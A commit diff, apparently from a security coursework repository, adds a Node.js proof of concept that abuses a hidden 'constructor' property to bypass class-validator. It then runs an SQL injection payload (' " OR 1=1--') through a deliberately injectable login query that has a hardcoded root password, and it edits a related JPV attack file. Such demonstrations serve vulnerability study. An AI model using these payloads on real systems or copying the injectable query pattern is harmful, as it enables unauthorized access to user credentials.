nayanadasgupta
diff --git a/‎.vs/VSWorkspaceState.json
Lines changed: 3 additions & 1 deletion b/‎.vs/VSWorkspaceState.json
Lines changed: 3 additions & 1 deletion
diff --git a/‎.vs/abusing_hidden_properties_node_js_attack/v17/.suo
21.5 KB b/‎.vs/abusing_hidden_properties_node_js_attack/v17/.suo
21.5 KB
diff --git a/‎.vs/slnx.sqlite
0 Bytes b/‎.vs/slnx.sqlite
0 Bytes
diff --git a/‎class-validator/class-validator_handling.js
Lines changed: 45 additions & 0 deletions b/‎class-validator/class-validator_handling.js
Lines changed: 45 additions & 0 deletions
diff --git a/‎jpv/2.2.1_JPV_internal_attack.js
Lines changed: 1 addition & 1 deletion b/‎jpv/2.2.1_JPV_internal_attack.js
Lines changed: 1 addition & 1 deletion
@@ -2,13 +2,15 @@
   "ExpandedNodes": [
     "",
     "\\bson-objectid",
+    "\\class-validator",
     "\\clone-deep",
     "\\component_type",
     "\\data",
     "\\jpv",
     "\\kind_of",
+    "\\models",
     "\\routes"
   ],
-  "SelectedNode": "\\kind_of\\attack.js",
+  "SelectedNode": "\\class-validator\\class-validator_handling.js",
   "PreviewInSolutionExplorer": false
 }
@@ -0,0 +1,45 @@
+var mysql = require('mysql2');
+var classValidator = require('class-validator');
+
+let requirements = {
+    host: 'localhost',
+    user: 'root',
+    password: 'compsec2',
+    database: 'sqldatabase'
+};
+var connection = mysql.createConnection(requirements);
+
+function bypassedValidation(emailInput, passwordInput) {
+    const sqlquery1 = `SELECT * FROM login WHERE email = ${emailInput} AND password = ${passwordInput}`;
+    connection.query(sqlquery1, function (error, rows) {
+        if (error) throw error;
+        console.log(rows);
+    });
+    
+    return ;
+}
+class attackSchema {
+    email;
+    password
+}
+let param = {
+    email: ' " OR 1=1--',
+    password: ' " OR 1=1--',
+    constructor: false
+};
+
+let test1Param = Object.assign(attackSchema, param);
+console.log("This is the merged schema:")
+console.log(test1Param);
+
+
+classValidator.validate(test1Param).then(errors => {
+    if (errors.length > 0) {
+        console.log('invalid email and or password, unable to validate user', errors);
+    } else {
+        console.log('valid email and password, user successfully validated. Relevant Database Information:');
+        bypassedValidation(test1Param.email, test1Param.password);
+    }
+});
+
+return;
@@ -17,7 +17,7 @@ function exampleJPV() {
 	const input = {
 		aMap: {
 		  badcode: "problematic input.", 
-		  constructor: new Map().constructor
+		  constructor: new Map.constructor
 		}
 	};
Original file line number	Diff line number	Diff line change
`@@ -17,7 +17,7 @@ function exampleJPV() {`
`17`	`17`	`const input = {`
`18`	`18`	`aMap: {`
`19`	`19`	`badcode: "problematic input.",`
`20`		`- constructor: new Map().constructor`
	`20`	`+ constructor: new Map.constructor`
`21`	`21`	`}`
`22`	`22`	`};`
`23`	`23`